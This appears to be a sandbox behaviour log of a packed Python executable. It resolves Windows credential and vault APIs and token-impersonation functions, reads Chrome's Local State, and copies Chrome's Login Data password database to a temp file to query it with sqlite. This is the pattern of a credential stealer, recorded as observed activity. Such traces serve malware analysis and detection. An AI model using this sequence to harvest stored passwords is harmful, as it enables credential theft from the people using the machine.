File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 4422, size_out = 4422 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 6260, size_out = 6260 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 19217, size_out = 19217 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 911, size_out = 911 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 4500, size_out = 4500 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 2295, size_out = 2295 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 71, size_out = 71 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 4399, size_out = 4399 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 2346, size_out = 2346 True 1
Fn
Data
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\advapi32, type = file_attributes False 1
Fn
Module Load module_name = advapi32, base_address = 0x769f0000 True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\crypt32, type = file_attributes False 1
Fn
Module Load module_name = crypt32, base_address = 0x75420000 True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\kernel32, type = file_attributes False 1
Fn
Module Load module_name = kernel32, base_address = 0x76910000 True 1
Fn
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = RevertToSelf, address_out = 0x76a01562 True 1
Fn
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = ImpersonateLoggedOnUser, address_out = 0x769fc57a True 1
Fn
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = DuplicateTokenEx, address_out = 0x769fca24 True 1
Fn
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x76a0418e True 1
Fn
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = LookupPrivilegeValueA, address_out = 0x76a0404a True 1
Fn
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = ConvertSidToStringSidA, address_out = 0x76a2192a True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = LocalAlloc, address_out = 0x76963363 True 1
Fn
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = GetTokenInformation, address_out = 0x76a0431c True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = OpenProcess, address_out = 0x769559d7 True 1
Fn
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = OpenProcessToken, address_out = 0x76a04304 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = CloseHandle, address_out = 0x7695ca7c True 1
Fn
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = CredEnumerateA, address_out = 0x76a37381 True 1
Fn
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = CredFree, address_out = 0x769fb2ec True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\msvcrt, type = file_attributes False 1
Fn
Module Load module_name = msvcrt, base_address = 0x76a90000 True 1
Fn
Module Get Address module_name = c:\windows\system32\msvcrt.dll, function = memcpy, address_out = 0x76a99910 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = LocalFree, address_out = 0x7695ca64 True 1
Fn
Module Get Address module_name = c:\windows\system32\crypt32.dll, function = CryptUnprotectData, address_out = 0x75455a7f True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\vaultcli, type = file_attributes False 1
Fn
Module Load module_name = vaultcli, base_address = 0x6e710000 True 1
Fn
Module Get Address module_name = c:\windows\system32\vaultcli.dll, function = VaultEnumerateVaults, address_out = 0x6e712945 True 1
Fn
Module Get Address module_name = c:\windows\system32\vaultcli.dll, function = VaultOpenVault, address_out = 0x6e7126a9 True 1
Fn
Module Get Address module_name = c:\windows\system32\vaultcli.dll, function = VaultEnumerateItems, address_out = 0x6e713099 True 1
Fn
Module Get Address module_name = c:\windows\system32\vaultcli.dll, function = VaultGetItem, address_out = 0x6e713242 True 1
Fn
Module Get Address module_name = c:\windows\system32\vaultcli.dll, function = VaultFree, address_out = 0x6e714321 True 1
Fn
Module Get Address module_name = c:\windows\system32\vaultcli.dll, function = VaultCloseVault, address_out = 0x6e712718 True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1001, size_out = 1001 True 1
Fn
Data
File Create filename = c:\users\eebsym5\appdata\local\temp\9r5qk2, file_attributes = _O_RDWR, _O_NOINHERIT, _O_CREAT, _O_EXCL True 1
Fn
File Write filename = c:\users\eebsym5\appdata\local\temp\9r5qk2, size = 4 True 1
Fn
Data
File Delete filename = c:\users\eebsym5\appdata\local\temp\9r5qk2 True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 405, size_out = 405 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 4583, size_out = 4583 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 101, size_out = 101 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1092, size_out = 1092 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\_sqlite3.pyd, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
Module Load module_name = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\_sqlite3.pyd, base_address = 0x6e170000 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29~1\_sqlite3.pyd, function = init_sqlite3, address_out = 0x6e175c10 True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 7762, size_out = 7762 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1706, size_out = 1706 True 1
Fn
Data
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Python\PythonCore\2.7\Modules\pwd False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Python\PythonCore\2.7\Modules\pwd False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\pwd.pyd, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\pwd.py, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\pwd.pyw, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\pwd.pyc, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Python\PythonCore\2.7\Modules\grp False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Python\PythonCore\2.7\Modules\grp False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\grp.pyd, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\grp.py, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\grp.pyw, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\grp.pyc, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 4354, size_out = 4354 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 4959, size_out = 4959 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1147, size_out = 1147 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 5548, size_out = 5548 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 5882, size_out = 5882 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 9029, size_out = 9029 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 231, size_out = 231 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 90, size_out = 90 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 94, size_out = 94 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 611, size_out = 611 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 94, size_out = 94 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 975, size_out = 975 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 438, size_out = 438 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 94, size_out = 94 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 11182, size_out = 11182 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1952, size_out = 1952 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 18653, size_out = 18653 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 4608, size_out = 4608 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 13594, size_out = 13594 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1036, size_out = 1036 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 91, size_out = 91 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 659, size_out = 659 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 489, size_out = 489 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 89, size_out = 89 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 6511, size_out = 6511 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 298, size_out = 298 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 4718, size_out = 4718 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 225, size_out = 225 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 3235, size_out = 3235 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1369, size_out = 1369 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1398, size_out = 1398 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 14981, size_out = 14981 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 2463, size_out = 2463 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 22528, size_out = 22528 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 407, size_out = 407 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 5495, size_out = 5495 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 2166, size_out = 2166 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 2246, size_out = 2246 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 343, size_out = 343 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 358, size_out = 358 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 597, size_out = 597 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 425, size_out = 425 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 35306, size_out = 35306 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 660, size_out = 660 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1391, size_out = 1391 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 462, size_out = 462 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1393, size_out = 1393 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1038, size_out = 1038 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 2026, size_out = 2026 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 2192, size_out = 2192 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\Crypto.Cipher._DES3.pyd, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
Module Load module_name = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\Crypto.Cipher._DES3.pyd, base_address = 0x10000000 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29~1\crypto.cipher._des3.pyd, function = init_DES3, address_out = 0x100026d0 True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1997, size_out = 1997 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 4370, size_out = 4370 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 15741, size_out = 15741 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 752, size_out = 752 True 1
Fn
Data
File Get Info filename = C:\Users\EEBsYm5\Local Settings\Application Data\Google\Chrome\User Data, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\Local Settings\Application Data\Google\Chrome\User Data\Local State, type = file_attributes True 1
Fn
File Create filename = C:\Users\EEBsYm5\Local Settings\Application Data\Google\Chrome\User Data\Local State, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\Local Settings\Application Data\Google\Chrome\User Data\Local State, size = 67148, size_out = 67147 True 1
Fn
Data
File Get Info filename = C:\Users\EEBsYm5\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data, type = file_attributes True 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\EEBsYm5\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data, type = file_attributes True 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq, type = file_attributes False 1
Fn
File Create filename = C:\Users\EEBsYm5\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Create filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq, file_attributes = _O_WRONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data, size = 16384, size_out = 16384 True 1
Fn
Data
File Write filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq, size = 16384 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data, size = 16384, size_out = 2048 True 1
Fn
Data
File Write filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq, size = 2048 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data, size = 16384, size_out = 0 False 1
Fn
File Get Info filename = C:\Users\EEBsYm5\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data, type = file_attributes True 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq, type = file_attributes True 1
Fn
System Get Info type = Hardware Information True 1
Fn
System Get Info type = Operating System True 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq, type = file_attributes True 1
Fn
File Create filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Read filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq, size = 100, size_out = 100 True 1
Fn
Data
File Get Info filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq-journal, type = file_attributes False 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq, type = size, size_out = 0 True 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq-wal, type = file_attributes False 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq, type = size, size_out = 0 True 1
Fn
File Read filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq, size = 2048, size_out = 2048 True 1
Fn
Data
File Get Info filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq-journal, type = file_attributes False 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq, type = size, size_out = 0 True 1
Fn
File Read filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq, size = 16, size_out = 16 True 1
Fn
Data
